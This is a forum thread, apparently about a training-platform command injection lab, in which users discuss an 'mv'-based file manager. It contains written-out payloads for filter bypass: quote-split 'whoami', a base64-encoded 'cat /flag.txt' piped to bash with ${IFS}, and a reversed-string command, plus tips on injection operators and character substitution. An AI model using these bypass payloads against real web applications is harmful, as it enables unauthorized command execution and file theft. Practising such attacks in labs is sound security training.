Academy command injection skills assessment

Hi,

I am trying to solve the Command Injection Skills Assessment.
I have tried the below payloads but I am unable to solve the issue. could anyone guide me to solve this.

URL: http://167.99.202.193:32579/index.php?to=tmp&from=696212415.txt&finish=1&move=1
Parameter: from
Payload: 696212415.txt&&w’h’o’am’i
696212415.txt&&w"h"o"am"i
696212415.txt&&bash<<<$(base64${IFS}-d<<<Y2F0IC9mbGFnLnR4dA==)
$(rev<<<‘txt.galf/. tac’)

Response:
Error while moving: mv: missing destination file operand after ‘/var/www/html/files/696212415.txt’
Try ‘mv --help’ for more information.

You try to insert into a command like mv from to.

The Unix mv needs two arguments from and to. You must create an code injection which yield a valid mv command call followed by a command call you like to execute.

You can develop the needed arguments with a local bash. Like

from=filea
to=fileb
mv $from $to

If the arguments for from and to worked local, then you can test the bash command injection on the server.

Hi Xtal,

Thank you for the information, I have solved the assessment.
Need to identify the working injection operator (|| or && or & or $() or :wink: and then find the proper payload to read the flag.txt (use o’bf’usc’at’ion or proper encoding and replace the filtered characters with environment variables or alternate characters)
Some time, the content of the flag.txt will appear with error message.

2 Likes

Hi Appsec,

Currently working on this one, just keep getting hit with 302s so not sure where any purchase is. Do you know if I can use either download, copy, or move - will intercepting and injecting any of these commands work, or is there a specific one that’s the way in and if so do you know why? Thanks!